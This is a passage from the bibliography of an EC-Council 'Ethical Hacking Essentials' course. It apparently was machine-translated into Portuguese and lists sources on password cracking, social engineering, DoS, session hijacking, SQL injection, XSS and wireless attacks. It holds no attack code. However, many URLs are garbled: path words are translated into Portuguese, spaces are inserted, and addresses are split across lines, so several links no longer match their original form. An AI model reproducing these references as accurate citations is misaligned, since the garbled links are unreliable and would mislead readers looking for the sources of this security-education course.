139. (2018), Microsoft NTLM, em https://docs.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm.
140. Amrita Mitra, (2017), What is Pass The Hash Attack?, em https://www.thesecuritybuddy.com/vulnerabilities/what-is-a
pass-the-hash-attack/.
141. (2019), Passe o hash, em https://en.wikipedia.org/wiki/Pass_the_hash.
142. Yaron Ziner, (2017), Técnicas avançadas que os invasores usam para quebrar senhas, de
https://resources.infosecinstitute.com/advanced-techniques-attackers-use-crack-passwords/#gref.
143. Jeff Petters, (2018), Kerberos Authentication Explained, em https://www.varonis.com/blog/kerberos-authentication

explicado/.
144. Ryan Becwar e Vincent Le Toux, (2019), Pass the Ticket, em https://attack.mitre.org/techniques/T1097/.
145. Chris Stoneff, (2018), Defending Against Pass-the-Ticket Attacks, de

https://www.beyondtrust.com/blog/entry/defending-against-pass-the-ticket-attacks.
146. (2017), Cracking Passwords: 11 Password Attack Methods (And How They Work), em https://datarecovery.com/
rd/cracking-passwords-11-password-attack-methods-work/.
147. Jens Steube, (2013), Adivinhação de senha avançada, de https://hashcat.net/events/p13/js-apg-htftl20.pdf.
148. Atom, (2010), Automated Password Cracking: Use oclHashcat To Launch A Fingerprint Attack, em https://www.question defense.com/2010/08/15/
automated-password-cracking-use-oclhashcat-to- lançar um ataque de impressão digital.
149. Os diferentes tipos de técnicas de quebra de senha, de https://password-managers.bestreviews.net/the-different

tipos de técnicas de quebra de senha/.
150. Lisa Bock, Defenda-se contra ataques de senha, em https://www.linkedin.com/learning/ethical-hacking-system hacking/defend-against-

password-attacks.
151. Daniel Doc Sewell, quebra de senha offline: o ataque e a melhor defesa, de
https://www.alpinesecurity.com/blog/offline-password-cracking-the-attack-and-the-best-defense-against-it.
152. Samantha Rorke, (2017), Protegendo sua rede contra ataques de senha de força bruta, de
https://www.lookglasscyber.com/blog/threat-intelligence-insights/protecting-network-brute-force-password-attacks/.
153. Como faço para criar uma senha forte e exclusiva?, em https://www.webroot.com/in/en/resources/tips-articles/how-do-i create-a-strong-password.
154. (2021), A senha deve atender aos requisitos de complexidade, de https://docs.microsoft.com/en-us/windows/security/threat

proteção/configurações de política de segurança/senha-deve-atender-requerimentos-de-complexidade.
155. Chris Hoffman, (2018), Como criar uma senha forte (e lembrar dela), de
https://www.howtogeek.com/195430/how-to-create-a-strong-password-and-remember-it/.

Referências
Módulo 05: Técnicas de Engenharia Social e Contramedidas
156. Terry Turner, Engenharia Social – As organizações podem vencer a batalha?, de

http://www.infosecwriters.com/text_resources/pdf/Social_Engineering_Can_Organizations_Win.pdf.
157. Sharon Gaudin, Social Engineering: The Human Side Of Hacking, em http://www.crime-research.org/library/Sharon2.htm.
158. (2007), Phishing e e-mails falsos: exemplos de HM Revenue and Customs, de https://
www.gov.uk/government/publications/phishing-and-bogus-emails-hm-revenue-and-customs-examples.
159. (2014), How to Protect Insiders from Social Engineering Threats, em https://docs.microsoft.com/en-us/previous
versões/tn-archive/cc875841(v=technet.10)?redirectedfrom=MSDN.
160. Gunter Ollmann, The Phishing Guide (Parte 1), de http://www.technicalinfo.net/papers/Phishing.html.
161. (2009), Engenharia social, de https://searchsecurity.techtarget.com/definition/social-engineering.
162. Personificação, de https://www.social-engineer.org/framework/attack-vectors/impersonation/.
163. Smishing, vishing e phishing… oh meu!, de https://www.forensicaccountingservices.com/fraudvault/smishing-vishing

e-phishing/.
164. Clari Melo, (2014), Conheça esses tipos comuns de roubo de identidade, em https://www.igrad.com/articles/8-types-of
roubo de identidade.
165. (2015), The 10 Major Types of Identity Theft, em https://www.idtheftauthority.com/types/.
166. (2011), The 6 Types of Identity Theft, de https://securingtomorrow.mcafee.com/consumer/family-safety/the-6-types-of

roubo de identidade/.
167. (2015), Identity Theft, de https://completeid.com/types-of-identity-theft/.
168. (2020), Engenharia social (segurança), de https://en.wikipedia.org/wiki/Social_engineering_(security)#Other_types.
169. Kevin Mitnick, What is social engineering?, de https://www.knowbe4.com/what-is-social-engineering/#1.
170. Courtney Heinbach, (2020), 5 tipos de ataques de engenharia social, https://www.datto.com/blog/5-types-of-social

ataques de engenharia.
171. Pierluigi Paganini, (2020), Os ataques de engenharia social mais comuns, de

https://resources.infosecinstitute.com/common-social-engineering-attacks/#gref.
172. Pretexto bem sucedido, de https://www.social-engineer.org/framework/influencing-others/pretexting/successful

pretexto/.
173. George Moraetes, (2017), Guia do CISO para gerenciar ameaças internas, em https://securityintelligence.com/the-cisos
guia para gerenciar ameaças internas/.
174. Linda Musthaler, (2008), 13 Melhores práticas para prevenir e detectar ameaças internas, de
https://www.networkworld.com/article/2280365/13-best-practices-for-preventing-and-detecting-insider-threats.html.
175. Práticas recomendadas de prevenção contra ameaças internas, em https://www.netwrix.com/Insider_Threat_Prevention_Best_Practices.html.
Módulo 06: Ataques e contramedidas em nível de rede
176. Grampos telefônicos ou escutas telefônicas, em https://en.wikipedia.org/wiki/Telephone_tapping.
177. Sakun, (2011), Overview of Layer 2 Switched Networks and Communication, from
http://www.sakunsharma.in/2011/07/overview-layer-2-switched-networks-communication/.
178. R. Droms, (1997), Dynamic Host Configuration Protocol, de https://www.ietf.org/rfc/rfc2131.txt.
179. Yusuf Bhaiji, Understanding, Preventing, Defending Against Layer 2 Attacks, em https://
www.sanog.org/resources/sanog15/sanog15-yusuf-l2-security.pdf.
180. Satya P Kumar Somayajula, Yella. Mahendra Reddy e Hemanth Kuppili, (2011), A New Scheme to Check ARP Spoofing: Prevention of MAN-
IN-THE-MIDDLE Attack, de http://www.ijcsit.com/docs/Volume%202/vol2issue4/ijcsit2011020420 .pdf.
181. Yusuf Bhaiji, Layer 2 Attacks & Mitigation Techniques, de https://www.sanog.org/resources/sanog7/yusuf-L2-attack

mitigação.pdf.
182. Farejamento indetectável na Ethernet, em https://www.askapache.com/hacking/sniffing-ethernet-undetected/.

Referências
183. Envenenamento de cache ARP /falsificação de ARP, em https://su2.info/doc/arpspoof.php.
184. Address Resolution Protocol (ARP), de https://www.erg.abdn.ac.uk/users/gorry/course/inet-pages/arp.html.
185. Tom Olzak, (2006), DNS Cache Poisoning: Definition and Prevention, de https://
adventuresinsecurity.com/Papers/DNS_Cache_Poisoning.pdf.
186. Daiji Sanai, (2001), Detecção de nós promíscuos usando pacotes ARP, de
http://www.securityfriday.com/promiscuous_detection_01.pdf.
187. (2016), 7 Popular Layer 2 Attacks, de http://www.pearsonitcertification.com/articles/article.aspx?p=2491767.
188. (2018), Common Attack Types on Switches, de https://digitalfortresslk.wordpress.com/2018/03/22/common-attack

tipos-on-switches/.
189. (2006), Denial of Service Attacks: Teardrop and Landÿÿ, de http://users.tkk.fi/~lhuovine/study/hacker98/dos.html.
190. (2006), CERT adverte sobre ataques de negação de serviço em rede – Computerworld, de
http://www.computerworld.com/action/pages.do?command=viewPage&pagePath=/404.
191. Stephen M. Specht e Ruby B. Lee, (2004), Distributed Denial of Service: Taxonomias of Attacks, Tools and Countermeasures,
de http://palms.ee.princeton.edu/PALMSopen/DDoS%20Final%20PDCS% 20Paper.pdf.
192. Craig A. Huegen, (2005), Denial of Service Attacks: "Smurfing", de http://www.pentics.net/denial-of-service/white

papers/smurf.cgi.
193. Frank Kargl, Jörn Maier, Stefan Schlott e Michael Weber, Protegendo servidores da Web contra negação de serviço distribuída
Ataques, de http://www10.org/cdrom/papers/409/.
194. (1997), Denial of Service Attacks, de https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496599.
195. Negação de serviço, em https://searchsecurity.techtarget.com/definition/denial-of-service.
196. Vladimir Golubev, (2005), ataques DoS: crime sem penalidade, de https://www.crime-research.org/articles/1049/.
197. Ping of death, de https://searchsecurity.techtarget.com/definition/ping-of-death.
198. Jason Anderson, (2001), An Analysis of Fragmentation Attacks, de http://www.ouah.org/fragma.html.
199. Mariusz Burdach, (2003), Hardening the TCP/IP stack to SYN attack, from
https://www.symantec.com/connect/articles/hardening-tcpip-stack-syn-attacks.
200. Deepak Singh Rana, Naveen Garg e Sushil Kumar Chamoli, (2012), Um estudo e detecção de ataques de inundação TCP SYN com
IP spoofing and its Mitigations, de http://
citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.434.8352&rep=rep1&type=pdf.
201. Stephen Specht e Ruby Lee, (2003), Taxonomias de Redes Distribuídas de Negação de Serviço, Ferramentas de Ataques e
Contramedidas, de https://www.princeton.edu/~rblee/DDoS%20Survey%20Paper_v7final.doc.
202. Gary C. Kessler, (2000), Defenses against Distributed Denial-Of-Service, em https://

www.garykessler.net/library/ddos.html.
203. Ataques DDoS, em https://www.grc.com/sn/sn-008.pdf.
204. Steve Gibson, (2002), Distributed Reflection Denial of Service, de https://

homes.cs.washington.edu/~arvind/cs425/doc/drdos.pdf.
205. Abhishek Singh, (2005), Demystifying Denial-Of-Service attack, part one, from
https://community.broadcom.com/symantecenterprise/communities/community home/
librarydocuments/viewdocument?DocumentKey=b5a87fa6-8c87-4f62-9804-
613c9dbcc9a8&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocument.
206. Ataque de negação de serviço, de https://en.wikipedia.org/wiki/Denial-of-service_attack.
207. O que é um ataque DDoS, em https://www.digitalattackmap.com/understanding-ddos/.
208. Glenn Carl e George Kesidis, (2009), Técnicas de detecção de ataques de negação de serviço,
https://www.evernote.com/shard/s9/note/b11a8c31-8651-4d74-acf9-1fb1b3c0f090/wishi/crazylazy#st=p&n=b11a8c31-8651-4d74-
acf9-1fb1b3c0f090.
209. Glenn Carl, (2006), Denial-of-Service Attack-Detection Techniques, de https://

www.computer.org/csdl/mags/ic/2006/01/w1082-abs.html.

Referências
210. Stephen M. Specht e Ruby B. Lee, (2003), Distributed Denial of Service: Taxonomias of Attacks, Tools and Countermeasures,
de http://palms.ee.princeton.edu/PALMSopen/DDoS%20Final%20PDCS% 20Paper.pdf.
211. Vijay C Uyyuru, Prateek Arora e Terry Griffin, Denial of Service (DoS), de http://
www.cse.unt.edu/~6581s001/vijay_dos1.ppt.
212. (2007), Denial Of services [botnet] (DoS), de https://www.go4expert.com/articles/denial-services-botnet-dos-t3184/.
213. SYN Flood Attack, em https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/.
214. Zobair Khan, (2015), Basics on DDos, em https://www.slideshare.net/kzobair/ddosbdnog.
215. Brian Prince, (2013), Multi-vector DDoS Attacks Grow in Sophistication, de https://www.securityweek.com/multi-vector
ddos-attacks-grow.
216. 35 tipos de ataques DDoS explicados, em https://javapipe.com/blog/ddos-types/.
217. UDP Flood Attack, em https://www.cloudflare.com/learning/ddos/udp-flood-ddos-attack/.
218. (2006), Hunt(1) - página de manual do Linux, em https://linux.die.net/man/1/hunt.
219. (2006), Web Application Attacks – Intro, de www.netprotect.ch/downloads/webguide.pdf.
220. Steps in Session Hijacking, em https://www.hackguide4u.com/2010/03/steps-in-session-hijacking.html.
221. Sequestro de sessão, em https://www.imperva.com/learn/application-security/session-hijacking/.
222. Adnan Anjum, Spoofing Vs Hijacking, em https://www.hackguide4u.com/2010/03/spoofing-vs-hijacking.html.
223. Lee Lawson, (2005), Session Hijacking Packet Analysis, de https://www.scribd.com/document/53979390/3479.
224. Ataque de sequestro de sessão, de https://owasp.org/www-community/attacks/Session_hijacking_attack.
225. Shray Kapoor, Session Hijacking Exploiting TCP, UDP and HTTP Sessions, de
http://www.infosecwriters.com/text_resources/pdf/SKapoor_SessionHijacking.pdf.
226. (2008), Prevention from Session Hijacking, de http://hydtechie.blogspot.com/2008/08/prevention-from-session

hijacking.html.
227. Harsh Kevadia, (2013), Session Hijacking, de https://www.slideshare.net/harshjk/session-hijacking-by-harsh-kevadiya.
228. Session Hijacking: A Primer, de http://www.cs.binghamton.edu/~steflik/cs455/sessionhijacking.htm.
Módulo 07: Ataques e contramedidas de aplicativos da Web

229. Adulteração de parâmetros da Web, em https://owasp.org/www-community/attacks/Web_Parameter_Tampering.
230. Protegendo aplicativos, em https://www.slideshare.net/florinc/application-security-1831714.
231. Robert Auger, (2009), Server Misconfiguration, de

http://projects.webappsec.org/w/page/13246959/Server%20Configuração incorreta.
232. (2009), Cache Poisoning, de https://owasp.org/www-community/attacks/Cache_Poisoning.
233. Melhorando a segurança de aplicativos da Web: ameaças e contramedidas, em https://docs.microsoft.com/en-us/previous

versões/msp-np/ff649874(v=pandp.10)?redirectedfrom=MSDN.
234. JD Meier, Alex Mackman, Michael Dunner, Srinath Vasireddy, Ray Escamilla e Anandha Murukan, (2010), Securing Your Web Server, em
https://docs.microsoft.com/en-us/previous-versions/msp -n p/ff648653(v=pandp.10)?redirectedfrom=MSDN.
235. Segurança do servidor Web e Segurança do servidor de banco de dados, em https://www.acunetix.com/websitesecurity/webserver-security/.
236. Lista de verificação de proteção do Windows IIS Server, em https://searchsecurity.techtarget.com/feature/Windows-IIS-server

hardening-checklist.
237. IIS Web Server Security, em https://www.acunetix.com/websitesecurity/iis-security/.
238. Lista de verificação: Protegendo seu servidor Web, em https://docs.microsoft.com/en-us/previous-versions/msp-n p/

ff648198(v=pandp.10)?redirectedfrom=MSDN.
239. Directory Traversal Attacks, de https://www.acunetix.com/websitesecurity/directory-traversal/.

Referências
240. Shani, Oren, (2010), Sistema e método para identificação, prevenção e gerenciamento de ataques de desfiguração de sites,
de https://www.freepatentsonline.com/y2010/0107247.html.
241. Bodvoc, (2010), An Overview of a Web Server, de https://bodvoc.wordpress.com/2010/07/02/an-overview-of-a-web

servidor/.
242. (2009), IIS 7.0 Architecture, de https://www.gandhipritesh.com/2009/05/iis-70-architecture.html.
243. Robert Auger, Server Misconfiguration, de http://projects.webappsec.org/w/page/13246959/Server-Misconfiguration.
244. Robert Auger, HTTP Response Splitting, de http://projects.webappsec.org/w/page/13246931/HTTP-Response-Splitting.
245. Divisão de resposta HTTP, em https://owasp.org/www-community/attacks/HTTP_Response_Splitting.
246. (2005), Introduction to HTTP Response Splitting, de https://securiteam.com/securityreviews/5WP0E2KFGK.
247. Como hackear um servidor Web, em https://www.guru99.com/how-to-hack-web-server.html.
248. Siddharth Bhattacharya, (2009), Hacking A Web Site and Secure Web Server Techniques Used, from
https://www.slideshare.net/siddharthbhattacharya/hacking-a-web-site-and-secure-web-server-techniques-used.
249. (2014), Qual é o objetivo final de hackear um servidor web?, de

https://security.stackexchange.com/questions/48705/what-is-the-ultimate-goal-of-hacking-a-webserver.
250. Sequestro de DNS: O que é e como funciona, em https://www.gohacking.com/dns-hijacking/.
251. Niranjan, (2006), DNS Amplification Attack, de http://nirlog.com/2006/03/28/dns-amplification-attack/.
252. (2009), Como detectar se o seu servidor web foi hackeado e ser alertado, em https://www.webdigi.co.uk/blog/2009/how-to detect-if-your-webserver-
is-hacked- e-ser-alertado.
253. Amit Klein, (2004), HTTP Response Splitting, Web Cache Poisoning Attacks, from
http://www.ouah.org/whitepaper_httpresponse.pdf.
254. Servidor Web, em https://www.tutorialspoint.com/internet_technologies/web_servers.htm.
255. Servidor da Web, em https://en.wikipedia.org/wiki/Web_server.
256. Addison Wesley Longman, 2003, Web Server Operation, de

http://web.cs.wpi.edu/~kal/courses/awt/lab6/wwwch11servlets.PDF.
257. (2019), Qual é a vulnerabilidade de falsificação de solicitação do lado do servidor e como evitá-la?, de
https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/.
258. Ian Muscat, (2019), What is Server Side Request Forgery (SSRF)?, de https://www.acunetix.com/blog/articles/server
side-request-forgery-vulnerability/.
259. Falsificação de solicitação do lado do servidor (SSRF), de https://portswigger.net/web-security/ssrf.
260. Ataques e contramedidas do servidor da Web, em https://sites.google.com/a/pccare.vn/it/security-pages/web-server

ataques e contramedidas.
261. (2019), DNS Hijacking: How to Identification and Protect Against it, em https://securitytrails.com/blog/dns-hijacking.
262. (2006), ISYOUR WEBSITE HACKABLE, de http://www.acunetix.com/vulnerability-scanner/wvsbrochure.pdf.
263. (2006), The 21 Primary Classes of Web Application Threats, de

www.netcontinuum.com/securityCentral/TopThreatTypes/index.cfm.
264. Path Traversal e URIs, de https://phucjimy.wordpress.com/category/document-security/.
265. Injeção de código, em https://owasp.org/www-community/attacks/Code_Injection.
266. (2009), Path Traversal, de https://owasp.org/www-community/attacks/Path_Traversal.
267. LDAP Injection & BLIND LDAP Injection, em https://www.blackhat.com/presentations/bh-europe-08/Alonso

Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf.
268. (2016), Cross-site Scripting (XSS), de https://owasp.org/www-community/attacks/xss/.
269. Robert "RSnake" Hansen, (2014), XSS Filter Evasion Cheat Sheet, de https://owasp.org/www-community/xss-filter
evasion-cheatsheet.
270. Gerenciando Web Services, em https://docs.oracle.com/cd/E19316-01/820-4335/gbbjk/index.html.
Referências Página 912 Ethical Hacking Essentials Copyright © por EC-Council


Referências
271. Ataques comuns de aplicativos baseados na Web, de

http://www.applicure.com/Common_Web_Based_Applications_Attacks#2._Injection_Flaws.
272. Perguntas frequentes sobre Cross-Site Scripting (XSS), em https://www.cgisecurity.com/xss-faq.html.
273. Quick Security Reference - Cross-Site Scripting.docx, de http://download.microsoft.com/download/E/E/7/EE7B9CF4-6A59-4832-8EDE-

B018175F4610/Quick%20Security%20Reference%20- %20Cross-Site%20Scripting.docx.
274. Jeff Orloff, The Big Website Guide to a Hacking Attack, de http://www.applicure.com/blog/big-website-guide-to-a
hacking-ataque.
275. What is Cross-Site Scripting (XSS)?, de http://www.applicure.com/blog/what-is-cross-site-scripting.
276. Amit Klein, (2005), DOM Based Cross Site Scripting or XSS of the Third Kind, de http://
www.webappsec.org/projects/articles/071105.shtml.
277. Philip Tellis, (2010), Common Security Mistakes in Web Applications, de https://
www.smashingmagazine.com/2010/10/common-security-mistakes-in-web-applications/.
278. JD Meier, Alex Mackman, Michael Dunner, Srinath Vasireddy, Ray Escamilla e Anandha Murukan, (2003), Improving
Segurança de aplicativos da Web: ameaças e contramedidas, em https://docs.microsoft.com/en-us/previous-versions/msp-n p/ff649874(v=pandp.10)?
redirectedfrom=MSDN.
279. Alex Homer, (2009), Components and Web Application Architecture, de https://docs.microsoft.com/en-us/previousversions/windows/it-pro/
windows-2000-server/bb727121(v=technet .10)?redirecionado de=MSDN.
280. Entrada não validada, de https://wiki.owasp.org/index.php/Unvalidated_Input.
281. Kevin Beaver, A importância da validação de entrada, de https://searchsoftwarequality.techtarget.com/tip/The-importance

de-entrada-validação.
282. Injeção de código, de https://en.wikipedia.org/wiki/Code_injection.
283. Robert Auger, (2011), LDAP Injection, de http://projects.webappsec.org/w/page/13246947/LDAP%20Injection.
284. Cross-site scripting, de https://en.wikipedia.org/wiki/Cross-site_scripting.
285. Akshay Jindal, Ataque de aplicativo da Web: Ataque de falhas de injeção, de http://funwhichuwant.blogspot.in/search?updated
max=2012-10-12T23:01:00-07:00&max-results=10&reverse-paginate=true&start =79&por data=falso.
286. Preetish Panda, (2009), Web Application Vulnerabilities, de https://www.slideshare.net/technoplex/web-application

vulnerabilidades.
287. Dawn Song, Web Security, de http://inst.eecs.berkeley.edu/~cs161/fa08/Notes/nov10-xss.pdf.
288. Ataques de validação de entrada, de https://www.insecure.in/input_validation.asp.
289. Abodiford, (2014), Sensitive Data Exposure, de https://www.slideshare.net/abodiford/sensitive-data-exposure.
290. (2017), XXE Injection Attacks – XML External Entity Vulnerability With Examples, from
https://www.darknet.org.uk/2017/10/xxe-injection-attacks-xml-external-entity-vulnerability-examples/.
291. Alex Coleman, User Authentication and Access Control in a Web Application, em https://selftaughtcoders.com/user authentication-access-control-
web-application/.
292. Tendências de ataques a aplicativos da Web, em https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Web-Application

Attack-Trends-2017-eng.pdf.
293. Autenticação quebrada e gerenciamento de sessão, de https://hdivsecurity.com/owasp-broken-authentication-and

gerenciamento de sessão.
294. Dafydd Stuttard e Marcus Pinto, (2011), The Web Application Hacker's Handbook, 2ª edição, Indianápolis, Wiley
Publicando.
295. Permita ou bloqueie o acesso a sites, em https://support.google.com/chrome/a/answer/7532419?hl=en.
296. Paul Rubens, (2018), How to Prevent SQL Injection Attacks, em https://www.esecurityplanet.com/threats/how-to
prevent-sql-injection-attacks.html.
297. Protegendo contra SQL Injection, em https://www.hacksplaining.com/prevention/sql-injection.
298. Qual é a vulnerabilidade de injeção de SQL e como evitá-la?, em https://www.netsparker.com/blog/web-security/sqljection-vulnerability/.

Referências
299. LDAP e LDAP Injection/Prevention, em https://www.geeksforgeeks.org/ldap-ldap-injectionprevention/.
300. (2018), Compreendendo e defendendo contra ataques de injeção de LDAP, em https://ldap.com/2018/05/04/understanding

e-defender-contra-ldap-injection-attacks/.
301. (2021), Top 10 Common Web Attacks: The First Steps to Protect Your Website, em https://
www.vpnmentor.com/blog/top-10-common-web-attacks/.
302. Lucero Davalos Vizcarra, (2019), As 10 principais vulnerabilidades de segurança da Web a serem observadas em 2019, de
https://cai.tools.sap/blog/top-10-web-security-vulnerabilities-to-watch-out-for-in-2019/.
303. Cross-Site Scripting (XSS), de https://phpsecurity.readthedocs.io/en/latest/Cross-Site-Scripting-(XSS).html.
304. Folha de dicas de prevenção de script entre sites, de

https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html.
305. Directory Traversal, de https://portswigger.net/web-security/file-path-traversal.
306. Impedindo passagem de diretório, em https://www.hacksplaining.com/prevention/directory-traversal.
307. (2013), Unvalidated Redirects and Forwards, de https://hdivsecurity.com/owasp-unvalidated-redirects-and-forwards.
308. (2017), Ask a Security Professional: Understanding Unvalidated Redirects and Forwards, from
https://www.sitelock.com/blog/how-to-mitigate-unvalidated-redirects-forwards/.
309. Nathan Rossiter, (2014), Ataques comuns de aplicativos da Web e como evitá-los, de
https://www.business2community.com/crisis-management/common-web-application-attacks-prevent-0949592.
310. (2008), Preventing SQL Injections in Online Applications: Study, Recommendations and Java Solution Prototype Based on
o SQL DOM, de http://mirror.kioss.undip.ac.id/pustaka-bebas/library-sw-hw/linux 1/security/WebGoat/
OWASP/OWASP-AppSecEU08-Janot.pdf.
311. Victor Chapela, Advanced SQL Injection, em https://www.slideshare.net/amiable_indian/advanced-sql-injection.
312. San-Tsai Sun, (2007), Classificação de Ataques de Injeção SQL, de

http://courses.ece.ubc.ca/412/term_project/reports/2007-fall/Classification_of_SQL_Injection_Attacks.pdf.
313. (2005), injeção SQL, de http://searchsqlserver.techtarget.com/feature/SQL-injection.
314. O que é SQL Injection?, em https://www.secpoint.com/sql-injection.html.
315. Aumento de ataques de injeção de SQL explorando entrada de dados de usuário não verificada, em https://docs.microsoft.com/en-us/security
updates/SecurityAdvisories/2008/954462.
316. (2006), Injection Protection, de https://docs.microsoft.com/en-us/previous

versões/sql/legacy/aa224806(v=sql.80)?redirectedfrom=MSDN.
317. SQL Injection, em https://owasp.org/www-community/attacks/SQL_Injection.
318. Krzysztof Kotowicz, (2010), SQL Injection: Passo a passo completo (não apenas) para desenvolvedores PHP, de
https://www.slideshare.net/kkotowicz/sql-injection-complete-walktrough-not-only-for-php-developers.
319. Dmitry Evteev, (2009), Advanced SQL Injection, de http://www.ptsecurity.com/download/PT-devteev-Advanced-SQL

Injection-ENG.zip.
320. Cameron Hotchkies, (2004), Blind SQL Injection Automation Techniques, de

https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf.
321. SQL Injection, de https://docs.microsoft.com/en-us/previous-versions/sql/sql-server-2008-

r2/ms161953(v=sql.105)?redirectedfrom=MSDN.
322. SQL Injection, de http://www.authorstream.com/Presentation/useful-155975-sql-injection-hacking-computers-22237-

educação-ppt-powerpoint/.
323. Ferruh Mavituna, (2007), SQL Injection Cheat Sheet, de https://www.netsparker.com/blog/web-security/sql-injection

folha de dicas/.
324. KK Mookhey e Nilesh Burghate, (2004), Detection of SQL Injection and Cross-site Scripting Attacks, from
https://community.broadcom.com/symantecenterprise/communities/community home/
librarydocuments/viewdocument?DocumentKey=001f5e09-88b4-4a9a-
b310-4c20578eecf9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments.

Referências
325. Debasish Das, Utpal Sharma e DK Bhattacharyya, (2010), Uma Abordagem para Detecção de Ataque de Injeção de SQL Baseada em
Correspondência de consulta dinâmica, em https://www.ijcaonline.org/journal/number25/pxc387766.pdf.
326. (2010), Quick Security Reference: SQL Injection, de http://download.microsoft.com/download/E/E/7/EE7B9CF4-6A59-

4832-8EDE-B018175F4610/Quick%20Security%20Reference%20-%20SQL%20Injection.docx.
327. Alexander Kornbrust, (2009), ODTUG - SQL Injection Crash Course for Oracle Developers, de http://www.red-database
security.com/wp/OOW2009_sql_crashcourse_for_developers.pdf.
328. William GJ Halfond, Jeremy Viegas e Alessandro Orso, (2006), A Classification of SQL Injection Attack Techniques and Countermeasures,
de https://www.cc.gatech.edu/~orso/papers/halfond.viegas.orso .ISSSE06.presentation.pdf.
329. (2010), SQL Injection, de https://docs.microsoft.com/en-us/previous-versions/sql/sql-server

2008/ms161953(v=sql.100)?redirectedfrom=MSDN.
330. Blind SQL Injection, de http://www.evilsql.com/main/page1.php.
331. SQL Injection, em https://www.w3schools.com/sql/sql_injection.asp.
332. Folha de dicas e tutorial de SQL Injection: Vulnerabilidades e como prevenir ataques de SQL Injection, de
https://www.veracode.com/security/sql-injection.
333. Tipos de SQL Injection (SQLi), em https://www.acunetix.com/websitesecurity/sql-injection2/.
334. Tudo o que você precisa saber sobre ataques e tipos de injeção SQL, exemplo de código SQLi, variações, vulnerabilidades e mais, em http://
www.firewall.cx/general-topics-reviews/web-application-vulnerability-scanners/1207 -how-sql-injection attack-work-examples.html.
335. Hack2Secure, (2017), Understanding SQL Injection Attacks, em https://www.hack2secure.com/blogs/understanding-sql

ataques de injeção.
336. Usando comentários para simplificar a injeção de SQL, em https://www.sqlinjection.net/comments/.
337. Folha de dicas de SQL Injection, de https://www.netsparker.com/blog/web-security/sql-injection-cheat

sheet/#InlineComments.
338. (2017), SQL Injection Tutorial, em https://www.w3resource.com/sql/sql-injection/sql-injection.php.
339. Types of SQL Injection Attacks, de http://hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm.
340. Injeção SQL cega baseada em tempo usando Consulta Pesada, em https://www.sqlinjection.net/heavy-query/.
341. Steve Friedl, (2017), SQL Injection Attacks by Example, em http://www.unixwiz.net/techtips/sql-injection.html.
342. Simone Quatrini e Marco Rondini, "Blind Sql Injection with Regular Expressions Attack", de
https://www.exploit-db.com/docs/english/17397-blind-sql-injection-with-regular-expressions-attack.pdf.
343. Técnicas de SQL Injection, em https://www.oratechinfo.co.uk/sql_injection.html.
344. SQL Injection Attack, de https://shodhganga.inflibnet.ac.in/bitstream/10603/123504/7/chapter%202.pdf.
345. SQL Injection: Vulnerabilidades e como prevenir ataques de SQL Injection, em https://www.veracode.com/security/sql
injeção.
Módulo 08: Ataques sem fio e contramedidas
346. Peter Loshin, (2019), Defending against the most common wireless network attack, from https://
searchsecurity.techtarget.com/feature/A-list-of-wireless-network-attacks.
347. Ajay Kumar Gupta, (2010), Comentário: Rogue Access Point Setups on Corporate Networks, de https://www.infosecurity magazine.com/
opinions/comment-rogue-access-point-setups-on-corporate/.
348. Bluetooth Security Risks and Tips to Prevent Security Threats, em https://www.brighthub.com/computing/smb security/articles/
30045.aspx.
349. Chris Weber e Gary Bahadu, (2009), Wireless Networking Security, de https://docs.microsoft.com/en-us/previousversions/windows/it-pro/
windows-xp/bb457019(v=technet. 10)?redirecionado de=MSDN.
350. Entendendo os Hotspots WiFi, em https://www.scambusters.org/wifi.html.
351. (2009), How 802.11 Wireless Works, de https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows server-2003/

cc757419(v=ws.10)? redirecionado de=MSDN.

Referências
352. TKIP (Temporal Key Integrity Protocol), em https://www.tech-faq.com/tkip-temporal-key-integrity-protocol.html.
353. Kevin Beaver e Peter T. Davis, Entendendo as fraquezas do WEP, de

https://www.dummies.com/programming/networking/understanding-wep-weaknesses/.
354. Rogue Wireless Access Point, em https://www.tech-faq.com/rogue-wireless-access-point.html.
355. ALFRED LOO, (2009), Security Threats of Smart Phones and Bluetooth, de http://
www.aaronfrench.com/coursefiles/ucommerce/Loo_2009.pdf.
356. Bradley Mitchell, (2020) Wired vs. Wireless Networking, em https://www.lifewire.com/wired-vs-wireless-networking

816352.
357. Bradley Mitchell, (2019), Wireless Standards - 802.11b 802.11a 802.11ge 802.11n, em https://www.lifewire.com/
wireless-standards-802-11a-802-11b-gn-and-802 -11ac-816553.
358. Wi-Fi Protected Access, em https://searchmobilecomputing.techtarget.com/definition/Wi-Fi-Protected-Access.
359. WPA (Wi-Fi Protected Access), em https://www.tech-faq.com/wpa-wi-fi-protected-access.shtml.
360. Paul Arana, (2006), Benefícios e Vulnerabilidades do Wi-Fi Protected Access 2 (WPA2), de
https://cs.gmu.edu/~yhwang1/INFS612/Sample_Projects/Fall_06_GPN_6_Final_Report.pdf.
361. Gary Wollenhaupt, How Cell Phone Jammers work, em https://electronics.howstuffworks.com/cell-phone-jammer1.htm.
362. Brian R. Miller e Booz Allen Hamilton, (2002), Issues in Wireless security, de https://www.acsac.org/2002/case/wed-c
330-Miller.pdf.
363. Martin Beck e TU-Dresden, (2008), Practical attack against WEP and WPA, from http://dl.aircrack
ng.org/breakingwepandwpa.pdf.
364. Chris Hurley, Encontrando pontos de acesso encobertos, (Capítulo 9), de

https://books.google.co.in/books?id=wGJhDNspE3wC&pg=PA333&lpg=PA333&dq=cloaked+access+point&source=bl&ots=
ZDkHSykDNV&sig=1sLKIx 1ZcqkhUdr1WpFaqYczyI&hl =en&ei=V8R2Ss35Oo2e6gP59viqCw&sa=X&oi=book_result&ct=result&redir_esc=y#v=onepage
&q=cloaked%20access%20point&f=false.
